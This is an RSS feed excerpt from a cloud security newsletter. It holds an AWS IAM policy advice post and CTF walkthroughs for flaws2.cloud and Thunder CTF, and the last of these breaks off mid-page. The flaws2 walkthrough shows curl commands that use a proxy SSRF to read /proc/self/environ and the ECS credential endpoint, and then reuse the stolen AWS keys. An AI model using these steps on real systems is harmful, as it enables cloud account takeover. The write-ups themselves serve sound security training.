  <link>https://cloudsecurity.club/p/aws-pentesting-securityaudit-readonly-or-viewonly</link>
  <guid isPermaLink="true">https://cloudsecurity.club/p/aws-pentesting-securityaudit-readonly-or-viewonly</guid>
  <pubDate>Wed, 22 May 2024 18:30:00 +0000</pubDate>
  <atom:published>2024-05-22T18:30:00Z</atom:published>
    <dc:creator>Chandrapal Badshah</dc:creator>
    <category><![CDATA[Aws]]></category>
  <content:encoded><![CDATA[
    <div class='beehiiv'><style>
  .bh__table, .bh__table_header, .bh__table_cell { border: 1px solid #C0C0C0; }
  .bh__table_cell { padding: 5px; background-color: #FFFFFF; }
  .bh__table_cell p { color: #2D2D2D; font-family: 'Helvetica',Arial,sans-serif !important; overflow-wrap: break-word; }
  .bh__table_header { padding: 5px; background-color:#F1F1F1; }
  .bh__table_header p { color: #2A2A2A; font-family:'Trebuchet MS','Lucida Grande',Tahoma,sans-serif !important; overflow-wrap: break-word; }
</style><div class='beehiiv__body'><p class="paragraph" style="text-align:left;">As a seasoned cloud security engineer, I’ve witnessed the crucial role of thoroughly testing AWS environments in identifying and fixing vulnerabilities before attackers can exploit them. </p><p class="paragraph" style="text-align:left;">I’ve been in two types of engagements – external cloud pentests and external cloud security assessments for regulatory compliance reasons.</p><p class="paragraph" style="text-align:left;">Regardless of the type of engagement, choosing the appropriate IAM policy for these activities can be a challenging task. </p><p class="paragraph" style="text-align:left;">Should you opt for SecurityAudit, ReadOnly, or ViewOnly? </p><p class="paragraph" style="text-align:left;">I’ve faced this situation often, and I’d like to share my perspective.</p><h1 class="heading" style="text-align:left;" id="the-big-three-policies-an-overview">The Big Three Policies: An Overview</h1><p class="paragraph" style="text-align:left;">For those new to this, here’s a quick overview of the key pre-defined IAM policies frequently considered for pentesting:</p><p class="paragraph" style="text-align:left;"><b>SecurityAudit (Version 42):</b> Grants permissions to assess the configuration of AWS resources for adherence to security best practices, including access to potentially sensitive information needed for auditing. It also grants permission to access the findings from AWS Security services like Inspector, GuardDuty, etc.</p><p class="paragraph" style="text-align:left;"><b>ReadOnly (Version 113): </b>As the name suggests, this policy allows read-only access to resources across most AWS services. A user/role with this policy can view and read data but not modify configurations. You must also note that this policy grants read-only access to both resource configurations and stored data.</p><p class="paragraph" style="text-align:left;"><b>ViewOnly (Version 18):</b> A more restrictive version of ReadOnly that removes access to some services/actions considered higher-risk.</p><p class="paragraph" style="text-align:left;">Please note that AWS manages the versions of these managed policies, and the information provided here is based on the versions mentioned above, which may change in the future.</p><h1 class="heading" style="text-align:left;" id="recommended-solution-security-audit">Recommended Solution: SecurityAudit</h1><p class="paragraph" style="text-align:left;">After careful consideration, my recommended solution for most pentesting scenarios is the SecurityAudit policy. This policy balances sufficient access for comprehensive testing and minimizing the risk of unintended data exposure or resource tampering.</p><p class="paragraph" style="text-align:left;">SecurityAudit grants access to vital security findings from services like Inspector, GuardDuty, and Macie, essential for identifying potential issues. It also allows access to network security configurations in Network Firewall, Shield, and WAF (v1, v2, and regional), enabling a thorough evaluation of your security posture.</p><p class="paragraph" style="text-align:left;">Additionally, SecurityAudit provides access to Resource Access Manager and SSM available patch status that are crucial for understanding the overall access control and system configurations across your AWS environment.</p><p class="paragraph" style="text-align:left;">ReadOnly policy is even more permissive than SecurityAudit. It grants almost all permissions of the SecurityAudit policy along with the permissions to do the following:</p><ul><li><p class="paragraph" style="text-align:left;">Fetch data from S3, DynamoDB, etc</p></li><li><p class="paragraph" style="text-align:left;">List and read Cognito users</p></li><li><p class="paragraph" style="text-align:left;">Clone repositories from CodeCommit</p></li><li><p class="paragraph" style="text-align:left;">Read from SQS queues</p></li><li><p class="paragraph" style="text-align:left;">Read (any secrets) stored in the SSM Parameter Store</p></li><li><p class="paragraph" style="text-align:left;">Get Lambda function code</p></li></ul><p class="paragraph" style="text-align:left;">This level of access may not be necessary for most pentests and could introduce unnecessary risks.</p><p class="paragraph" style="text-align:left;">ViewOnly, on the other hand, is more restrictive and may not provide sufficient visibility into key security configurations and findings. It doesn’t allow users to get the findings from AWS Security services like Inspector, GuardDuty, etc.</p><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/f3c9873c-2a27-4a43-8a4f-7ba3e777d622/image-1.png?t=1731242164"/><div class="image__source"><span class="image__source_text"><p>This image is a visual representation only, though in reality, exceptions such as unique permissions in each policy may exist.</p></span></div></div><h1 class="heading" style="text-align:left;" id="best-possible-solution-least-privil">Best Possible Solution: Least Privileged Access Based on Scope</h1><p class="paragraph" style="text-align:left;">Every external pentest and cloud security assessment has its scope.</p><p class="paragraph" style="text-align:left;">The best possible solution is to grant access only to the specific services and actions required for the pentest. This approach minimizes the potential blast radius and ensures that the pentester has the minimum necessary permissions to conduct their assessment effectively.</p><p class="paragraph" style="text-align:left;">To achieve this, consider creating a custom IAM policy with specific permissions needed for your pentest scope. A custom policy allows you to fine-tune access and align it precisely with your testing requirements.</p><h1 class="heading" style="text-align:left;" id="conclusion">Conclusion</h1><p class="paragraph" style="text-align:left;">Choosing the right IAM policy for your AWS pentesting requires careful consideration of your testing requirements and risk tolerance. While <code>SecurityAudit</code> provides a solid foundation for most assessments, the best approach is to adhere to the principle of least privilege and grant access only to the specific services and actions necessary for your pentest.</p><p class="paragraph" style="text-align:left;">Avoid granting <code>Get*</code> and <code>Describe*</code> permissions without careful consideration, as it may unintentionally allow access to sensitive data that should be restricted.</p><h1 class="heading" style="text-align:left;" id="fa-qs">FAQs</h1><h3 class="heading" style="text-align:left;" id="1-im-still-not-convinced-why-should">1. I’m still not convinced. Why should I not give ReadOnly policy access?</h3><p class="paragraph" style="text-align:left;">Let me put it another way. The risk of the ReadOnly policy is granting access to data. Despite your engagement under NDA, external pentesters/consultants are “technically capable” of copying your data. Do you have the technical capabilities to analyze their actions in your account? (On both management and data events.)</p><h3 class="heading" style="text-align:left;" id="2-are-there-any-situations-when-rea">2. Are there any situations when ReadOnly access is needed?</h3><p class="paragraph" style="text-align:left;">It depends. ReadOnly access grants access to data in S3 and DynamoDB. It lets you download Lambda code, clone images from ECR, clone repositories from CodeCommit, etc. Suppose your pentest includes scanning data (maybe as part of data security assessments) or finding security issues in Lambda code, ECR repos, etc.. In that case, it might make sense to grant ReadOnly.</p><h3 class="heading" style="text-align:left;" id="3-my-external-pentest-company-has-g">3. My external pentest company has given me a custom policy, which I suspect is just a copy of the ReadOnly policy. How can I quickly find the access granted?</h3><p class="paragraph" style="text-align:left;">Post the policy in the <a class="link" href="https://Permissions.Cloud?utm_source=cloudsecurity.club&utm_medium=newsletter&utm_campaign=aws-pentesting-best-practices-securityaudit-readonly-or-viewonly" target="_blank" rel="noopener noreferrer nofollow">Permissions.Cloud</a><a class="link" href="https://aws.permissions.cloud/policyevaluator?utm_source=cloudsecurity.club&utm_medium=newsletter&utm_campaign=aws-pentesting-best-practices-securityaudit-readonly-or-viewonly" target="_blank" rel="noopener noreferrer nofollow">’s Policy Evaluator</a>. It flags any IAM permissions that leads to data access and credentials exposure.</p></div><div class='beehiiv__footer'><br class='beehiiv__footer__break'><hr class='beehiiv__footer__line'><a target="_blank" class="beehiiv__footer_link" style="text-align: center;" href="https://www.beehiiv.com/?utm_campaign=4afa0246-5398-42d7-a9ea-e7c311ce22ca&utm_medium=post_rss&utm_source=cloud_security_club">Powered by beehiiv</a></div></div>
  ]]></content:encoded>
</item>

      <item>
  <title>Solving Flaws2.Cloud: A Step-by-Step Guide</title>
  <description>A complete guide to solving Flaws2.cloud challenges, focusing on AWS misconfigurations in Lambda and ECS to build cloud security expertise.</description>
      <enclosure url="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/9d859acc-a4f4-4597-a505-d08c572067a1/flaws2.cloud_cover.jpg" length="27912" type="image/jpeg"/>
  <link>https://cloudsecurity.club/p/solving-flaws2-cloud</link>
  <guid isPermaLink="true">https://cloudsecurity.club/p/solving-flaws2-cloud</guid>
  <pubDate>Tue, 21 May 2024 18:30:00 +0000</pubDate>
  <atom:published>2024-05-21T18:30:00Z</atom:published>
    <dc:creator>Suraj Yadav</dc:creator>
    <category><![CDATA[Ctf]]></category>
    <category><![CDATA[Aws]]></category>
  <content:encoded><![CDATA[
    <div class='beehiiv'><style>
  .bh__table, .bh__table_header, .bh__table_cell { border: 1px solid #C0C0C0; }
  .bh__table_cell { padding: 5px; background-color: #FFFFFF; }
  .bh__table_cell p { color: #2D2D2D; font-family: 'Helvetica',Arial,sans-serif !important; overflow-wrap: break-word; }
  .bh__table_header { padding: 5px; background-color:#F1F1F1; }
  .bh__table_header p { color: #2A2A2A; font-family:'Trebuchet MS','Lucida Grande',Tahoma,sans-serif !important; overflow-wrap: break-word; }
</style><div class='beehiiv__body'><p class="paragraph" style="text-align:left;"><a class="link" href="https://flaws2.cloud?utm_source=cloudsecurity.club&utm_medium=newsletter&utm_campaign=solving-flaws2-cloud-a-step-by-step-guide" target="_blank" rel="noopener noreferrer nofollow">flaws2.cloud</a> challenges are hands-on exercises designed to help users identify and exploit security misconfigurations in AWS environments. Participants learn to understand common misconfigurations and weaknesses in cloud infrastructure, improving their skills in securing cloud services. These challenges are valuable for beginners and experienced professionals seeking practical, real-world experience in cloud security.</p><p class="paragraph" style="text-align:left;">Flaws2 offers two paths this time: Attacker and Defender! This blog post will discuss the Attacker’s side to learn about serverless (Lambda) and container (ECS Fargate) misconfigurations.</p><p class="paragraph" style="text-align:left;">In case you haven’t checked out my <a class="link" href="https://cloudsecurity.club/p/solving-flaws-cloud?utm_source=cloudsecurity.club&utm_medium=newsletter&utm_campaign=solving-flaws2-cloud-a-step-by-step-guide" target="_blank" rel="noopener noreferrer nofollow">flaws.cloud writeup</a>: I highly recommend doing it now.</p><h1 class="heading" style="text-align:left;" id="level-1">Level 1</h1><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/afd0a657-aaaa-4771-8278-3f35be95a0c1/image-1.jpeg?t=1731228079"/></div><p class="paragraph" style="text-align:left;"><b>Solution</b>: Here, it asks for a 100-digit number. If you give the wrong number, it prints “Incorrect. Try again,” but for non-integer input, it pops an alert saying, “Code must be a number.”</p><p class="paragraph" style="text-align:left;">Let’s look at the HTML logic in the page</p><div class="codeblock"><pre><code>&lt;form name=&quot;myForm&quot; action=&quot;https://2rfismmoo8.execute-api.us-east-1.amazonaws.com/default/level1&quot; onsubmit=&quot;return validateForm()&quot;&gt;
    Code: &lt;input type=&quot;text&quot; name=&quot;code&quot; value=&quot;1234&quot;&gt;
    &lt;br&gt;&lt;br&gt;
    &lt;input type=&quot;submit&quot; value=&quot;Submit&quot;&gt;
&lt;/form&gt;</code></pre></div><p class="paragraph" style="text-align:left;">The form submits the input to the URL <code>https://2rfismmoo8.execute-api.us-east-1.amazonaws.com/default/level1</code>.</p><div class="blockquote"><blockquote class="blockquote__quote"><p class="paragraph" style="text-align:left;"><b>NOTE</b>: If you have already checked Level 6 in the <a class="link" href="https://cloudsecurity.club/p/solving-flaws-cloud?utm_source=cloudsecurity.club&utm_medium=newsletter&utm_campaign=solving-flaws2-cloud-a-step-by-step-guide" target="_blank" rel="noopener noreferrer nofollow"><b>flaws.cloud writeup</b></a>, you can quickly identify that this is an API Gateway URL, as the URL follows the pattern “<code>https://&#123;api-id&#125;.execute-api.&#123;region&#125;.amazonaws.com/&#123;stage&#125;</code>”. In this URL, “<code>2rfismmoo8</code>” refers to the API Gateway ID, “<code>default</code>” is the stage of the API deployment, and “level1 ” is the specific resource we are accessing.</p><figcaption class="blockquote__byline"></figcaption></blockquote></div><p class="paragraph" style="text-align:left;">Let’s intercept the traffic in Burp Suite. The HTML page sent the form data to the server using the GET method. The request contains the input given to the form in the query “<b>?code=1234</b>”.</p><p class="paragraph" style="text-align:left;">When I pass on a non-integer input, the server sends an “<b>HTTP/2 500 Internal Server Error</b>,” indicating a problem on the server side while processing your request. However, it dumps many environment variables containing information like AWS access keys, session tokens, etc.</p><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/705dd40f-68a0-4556-bf0c-7ebc72dcf935/image-2.jpeg?t=1731228174"/></div><p class="paragraph" style="text-align:left;">Save these access keys and the session token in the <code>~/.aws/credentials</code> to configure AWS CLI for a named profile. Then, try listing the files in bucket <a class="link" href="https://level1.flaws2.cloud?utm_source=cloudsecurity.club&utm_medium=newsletter&utm_campaign=solving-flaws2-cloud-a-step-by-step-guide" target="_blank" rel="noopener noreferrer nofollow">level1.flaws2.cloud</a>.</p><div class="codeblock"><pre><code>aws --profile level1-flaws2 s3 ls s3://level1.flaws2.cloud</code></pre></div><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/2f1cf0ea-464b-4e51-894b-d2e331eba0fc/image-3.png?t=1731228188"/></div><p class="paragraph" style="text-align:left;">It contains a secret file; try accessing it in the browser.</p><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/62b8d0a6-31de-47b9-9413-b9207283d18d/image-4.jpeg?t=1731228200"/></div><p class="paragraph" style="text-align:left;"><code>secret-ppxVFdwV4DDtZm8vbQRvhxL8mE6wxNco.html</code> contains the URL to Level2.</p><h1 class="heading" style="text-align:left;" id="level-2">Level 2</h1><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/aea4f682-d691-43bc-8d43-2f4d88080de6/image-5.jpg?t=1731228223"/></div><p class="paragraph" style="text-align:left;"><b>Solution</b>: Opening the container URL shows a login screen asking for a username and password.</p><p class="paragraph" style="text-align:left;">The hint in the description tells us to search the ECR repository named level2. Let’s try listing all ECR repositories in the account. The credentials from <b>level1-flaws2</b> don’t have permission for the action <code>ecr:DescribeRespositories</code>.</p><div class="codeblock"><pre><code>aws --profile level1-flaws2 --region us-east-1 ecr describe-repositories</code></pre></div><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/db29ad43-9347-47c0-a505-d8882f4e7853/image-6.png?t=1731228264"/></div><p class="paragraph" style="text-align:left;">So, let’s just get all the images’ metadata in the repository named “level2”.</p><div class="codeblock"><pre><code>aws --profile level1-flaws2 --region us-east-1 ecr describe-images --repository-name level2</code></pre></div><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/773bb38a-abf0-46e9-8a0a-10f1ecbc02ee/image-7.png?t=1731228282"/></div><p class="paragraph" style="text-align:left;">The level2 repository above has an image tagged as latest, with the image digest <b>sha256:513e7d8a5fb9135a61159fbfbc385a4beb5ccbd84e5755d76ce923e040f9607e. </b>The first <a class="link" href="https://docs.aws.amazon.com/AmazonECR/latest/userguide/registry_auth.html?utm_source=cloudsecurity.club&utm_medium=newsletter&utm_campaign=solving-flaws2-cloud-a-step-by-step-guide" target="_blank" rel="noopener noreferrer nofollow">docker client needs to be authenticated with Amazon ECR</a> to pull the image using docker pull. Use the <i><b>aws ecr get-login-password</b></i> command to get the authentication token and pass it to the docker login command using the username AWS.</p><div class="codeblock"><pre><code>aws ecr get-login-password --region us-east-1 --profile level1-flaws2 | sudo docker login --username AWS --password-stdin 653711331788.dkr.ecr.us-east-1.amazonaws.com</code></pre></div><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/a6e06d19-4ef6-4486-bbb6-e47042416d0f/image-8.png?t=1731228308"/></div><p class="paragraph" style="text-align:left;">Now, pull the image using the command:</p><div class="codeblock"><pre><code>docker pull 653711331788.dkr.ecr.us-east-1.amazonaws.com/level2:latest</code></pre></div><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/b9b234c1-3af6-44a4-9718-ee5e22503f5f/image-9.png?t=1731228342"/></div><p class="paragraph" style="text-align:left;">Run the docker container using the following command:</p><div class="codeblock"><pre><code>docker run -it 653711331788.dkr.ecr.us-east-1.amazonaws.com/level2 /bin/bash</code></pre></div><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/3227620c-d6ec-4d52-8ef6-f5aca9aa14a8/image-10.png?t=1731228364"/></div><p class="paragraph" style="text-align:left;">The container contains the file that leads to level3.</p><h1 class="heading" style="text-align:left;" id="level-3">Level 3</h1><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/f7b13392-8eb7-41ae-aac8-b391eef799d8/image-11.jpg?t=1731228387"/></div><p class="paragraph" style="text-align:left;"><b>Solution</b>: This simple proxy allows us to use the container’s webserver to make HTTP requests to an arbitrary domain, which can lead to unauthorized access to internal resources.</p><p class="paragraph" style="text-align:left;">Just like EC2 has a metadata endpoint at the IP 169.254.169.254, <a class="link" href="https://docs.aws.amazon.com/AmazonECS/latest/developerguide/task-metadata-endpoint-v2.html?utm_source=cloudsecurity.club&utm_medium=newsletter&utm_campaign=solving-flaws2-cloud-a-step-by-step-guide" target="_blank" rel="noopener noreferrer nofollow">ECS containers have a task metadata endpoint</a> at the IP 169.254.170.2.</p><p class="paragraph" style="text-align:left;">If a container running on ECS needs IAM credentials during execution, AWS recommends using a <a class="link" href="https://docs.aws.amazon.com/AmazonECS/latest/developerguide/task-iam-roles.html?utm_source=cloudsecurity.club&utm_medium=newsletter&utm_campaign=solving-flaws2-cloud-a-step-by-step-guide" target="_blank" rel="noopener noreferrer nofollow">task IAM Role</a>. When the container is <a class="link" href="https://docs.aws.amazon.com/AmazonECS/latest/bestpracticesguide/security-iam-roles.html?utm_source=cloudsecurity.club&utm_medium=newsletter&utm_campaign=solving-flaws2-cloud-a-step-by-step-guide" target="_blank" rel="noopener noreferrer nofollow">configured with the role</a>, AWS automatically injects the environment variable <b>AWS_CONTAINER_CREDENTIALS_RELATIVE_URI </b>to help running applications fetch temporary credentials during execution.</p><p class="paragraph" style="text-align:left;">The value of the above environment variable can be appended to the task metadata endpoint (169.254.170.2) to fetch temporary credentials.</p><p class="paragraph" style="text-align:left;">We can obtain the value of <code>AWS_CONTAINER_CREDENTIALS_RELATIVE_URI</code> from the file <code>/proc/self/environ</code> (this path contains all the environment variables available within a Linux system).</p><div class="codeblock"><pre><code>curl --output - http://container.target.flaws2.cloud/proxy/proc/self/environ | tr &#39;\0&#39; &#39;\n&#39;</code></pre></div><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/1b2c683a-b7a8-4c9a-95e0-5fd2f1b9aa94/image-12.png?t=1731228416"/></div><p class="paragraph" style="text-align:left;">Now, try to access the <b>169.254.170.2/$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI</b> to get the credentials.</p><div class="codeblock"><pre><code>curl --output - http://container.target.flaws2.cloud/proxy/http://169.254.170.2/v2/credentials/cb3fc49d-d169-4964-bb43-f6a5d33034bd | jq</code></pre></div><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/536924ea-2a82-414e-b546-6b70bda074aa/image-13.png?t=1731228451"/></div><p class="paragraph" style="text-align:left;">Save these access keys and the session token in the <code>~/.aws/credentials</code> to configure AWS CLI for a profile name, such as <b>level3-flaws2</b>. Then, try to list the buckets.</p><div class="codeblock"><pre><code>aws --profile level3-flaws2 s3 ls</code></pre></div><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/32dc684c-5b0f-47e7-a1df-2e1683b4db56/image-14.png?t=1731228464"/></div><p class="paragraph" style="text-align:left;">The output contains the bucket name, the end of the <a class="link" href="https://flaws2.cloud?utm_source=cloudsecurity.club&utm_medium=newsletter&utm_campaign=solving-flaws2-cloud-a-step-by-step-guide" target="_blank" rel="noopener noreferrer nofollow">flaws2.cloud</a>.</p><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/bae1bb72-740a-42eb-a6da-8c4a65ed2bb4/image-15.jpeg?t=1731228480"/></div></div><div class='beehiiv__footer'><br class='beehiiv__footer__break'><hr class='beehiiv__footer__line'><a target="_blank" class="beehiiv__footer_link" style="text-align: center;" href="https://www.beehiiv.com/?utm_campaign=24279163-0b89-49d9-8721-00d6a0e06408&utm_medium=post_rss&utm_source=cloud_security_club">Powered by beehiiv</a></div></div>
  ]]></content:encoded>
</item>

      <item>
  <title>Solving Thunder-CTF: Level 06</title>
  <description>Step-by-step guide to solving Thunder CTF Level 6. Build your GCP skills with practical cloud security techniques and solutions.</description>
      <enclosure url="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/1d3c65d4-b17f-46cc-a6d2-410fa0241eb0/Thunder_CTF_06_Cover.jpg" length="18752" type="image/jpeg"/>
  <link>https://cloudsecurity.club/p/solving-thunder-ctf-level-6</link>
  <guid isPermaLink="true">https://cloudsecurity.club/p/solving-thunder-ctf-level-6</guid>
  <pubDate>Sun, 26 May 2024 18:30:00 +0000</pubDate>
  <atom:published>2024-05-26T18:30:00Z</atom:published>
    <dc:creator>Sarthak Bokade</dc:creator>
    <category><![CDATA[Ctf]]></category>
    <category><![CDATA[Gcp]]></category>
  <content:encoded><![CDATA[
    <div class='beehiiv'><style>
  .bh__table, .bh__table_header, .bh__table_cell { border: 1px solid #C0C0C0; }
  .bh__table_cell { padding: 5px; background-color: #FFFFFF; }
  .bh__table_cell p { color: #2D2D2D; font-family: 'Helvetica',Arial,sans-serif !important; overflow-wrap: break-word; }
  .bh__table_header { padding: 5px; background-color:#F1F1F1; }
  .bh__table_header p { color: #2A2A2A; font-family:'Trebuchet MS','Lucida Grande',Tahoma,sans-serif !important; overflow-wrap: break-word; }
</style><div class='beehiiv__body'><p class="paragraph" style="text-align:left;">We have come to the final level in Thunder CTF. Here are links to my previous level writeups (just in case you haven’t checked it):</p><ul><li><p class="paragraph" style="text-align:left;"><a class="link" href="https://cloudsecurity.club/p/solving-thunder-ctf-level-1?utm_source=cloudsecurity.club&utm_medium=newsletter&utm_campaign=solving-thunder-ctf-level-06" target="_blank" rel="noopener noreferrer nofollow">Solving Thunder CTF: Level 01</a></p></li><li><p class="paragraph" style="text-align:left;"><a class="link" href="https://cloudsecurity.club/p/solving-thunder-ctf-level-2?utm_source=cloudsecurity.club&utm_medium=newsletter&utm_campaign=solving-thunder-ctf-level-06" target="_blank" rel="noopener noreferrer nofollow">Solving Thunder CTF: Level 02</a></p></li><li><p class="paragraph" style="text-align:left;"><a class="link" href="https://cloudsecurity.club/p/solving-thunder-ctf-level-3?utm_source=cloudsecurity.club&utm_medium=newsletter&utm_campaign=solving-thunder-ctf-level-06" target="_blank" rel="noopener noreferrer nofollow">Solving Thunder CTF: Level 03</a></p></li><li><p class="paragraph" style="text-align:left;"><a class="link" href="https://cloudsecurity.club/p/solving-thunder-ctf-level-4?utm_source=cloudsecurity.club&utm_medium=newsletter&utm_campaign=solving-thunder-ctf-level-06" target="_blank" rel="noopener noreferrer nofollow">Solving Thunder CTF: Level 04</a></p></li><li><p class="paragraph" style="text-align:left;"><a class="link" href="https://cloudsecurity.club/p/solving-thunder-ctf-level-5?utm_source=cloudsecurity.club&utm_medium=newsletter&utm_campaign=solving-thunder-ctf-level-06" target="_blank" rel="noopener noreferrer nofollow">Solving Thunder CTF: Level 05</a></p></li></ul><p class="paragraph" style="text-align:left;">Starting <a class="link" href="https://thunder-ctf.cloud/thunder/a6container.html?utm_source=cloudsecurity.club&utm_medium=newsletter&utm_campaign=solving-thunder-ctf-level-06" target="_blank" rel="noopener noreferrer nofollow">Level 6</a>:</p><div class="codeblock"><pre><code>python3 thunder.py create thunder/a6container</code></pre></div><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/3a85a6d0-c206-4e41-93ea-43f9de5b3b88/image-0.png?t=1731226387"/></div><p class="paragraph" style="text-align:left;">I am authenticating with the service account associated with this level.</p><div class="codeblock"><pre><code>gcloud auth activate-service-account --key-file=start/a6-access.json</code></pre></div><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/9f6ea941-ddb9-42ba-83f5-2ba62505c55e/image-1.png?t=1731226402"/></div><p class="paragraph" style="text-align:left;">Now, first, we will test the permissions of the a6-access.json, which is the corresponding key for the service account</p><div class="codeblock"><pre><code>python scripts/test-permissions.py start/a6-access.json</code></pre></div><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/a2b3a61f-d244-4475-aee6-60fe30eba03c/image-2.png?t=1731226414"/></div><p class="paragraph" style="text-align:left;">This service account has permissions related to the compute instance and storage.</p><p class="paragraph" style="text-align:left;">Let’s list the storage objects:</p><div class="codeblock"><pre><code>gsutil ls gs://&lt;bucket_name&gt;</code></pre></div><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/7550a3bf-37bd-4fb0-b817-f7fca018ac3c/image-3.png?t=1731226446"/></div><p class="paragraph" style="text-align:left;">Finding the file containing the secret was easy. However, the catch is we can only list the objects but not download them (as the service account doesn’t have <code>storage.buckets.get</code> permission).</p><p class="paragraph" style="text-align:left;">Let’s see what we can find from the compute instances. Listing the instances shows the following:</p><div class="codeblock"><pre><code>gcloud compute instances list</code></pre></div><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/88b9475b-472d-4c5f-a362-7c06a98e9122/image-4.png?t=1731226478"/></div><p class="paragraph" style="text-align:left;">Since we also have compute.instances.get permission, we can describe the compute instance.</p><div class="codeblock"><pre><code>gcloud compute instances describe a6-container-vm --zone=us-west1-b</code></pre></div><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/c7f6e4af-3084-4d78-9cf7-d396fdf02f27/image-5.png?t=1731226504"/></div><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/926bb572-0564-487f-9778-5d28252a6dda/image-6.png?t=1731226523"/></div><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/6285f70e-6f34-40eb-b217-5ad7fd1c4b6e/image-7.png?t=1731226535"/></div><p class="paragraph" style="text-align:left;">This compute instance has a docker image added under the “<a class="link" href="https://cloud.google.com/compute/docs/containers/deploying-containers?utm_source=cloudsecurity.club&utm_medium=newsletter&utm_campaign=solving-thunder-ctf-level-06" target="_blank" rel="noopener noreferrer nofollow">gce-container-declaration</a>” metadata section. So, it is just running the container.</p><p class="paragraph" style="text-align:left;">When we searched for that particular image in the Docker Hub, we found it there. That means it is publicly available, and even we can pull that image and analyze it further.</p><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/011d4546-6b80-4006-99e9-348db5422ab6/image-8.png?t=1731226565"/></div><p class="paragraph" style="text-align:left;">We can pull the docker image in Cloudshell and analyze it further.</p><div class="codeblock"><pre><code>docker version</code></pre></div><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/c754fb8c-8c85-49b6-9d31-a394b30013cf/image-9.png?t=1731226589"/></div><div class="codeblock"><pre><code>docker pull wuchangfeng/thunder-ctf-a6:latest</code></pre></div><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/82341486-d0fa-48e9-a87b-c75454901eca/image-10.png?t=1731226606"/></div><div class="codeblock"><pre><code>docker run -it --entrypoint=/bin/bash wuchangfeng/thunder-ctf-a6</code></pre></div><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/d9cd1ad1-c87b-41d1-92fd-067234460a2e/image-11.png?t=1731226624"/></div><p class="paragraph" style="text-align:left;">Let’s navigate inside the container</p><div class="codeblock"><pre><code>ls</code></pre></div><div class="image"><img alt="" class="image__image" style="" 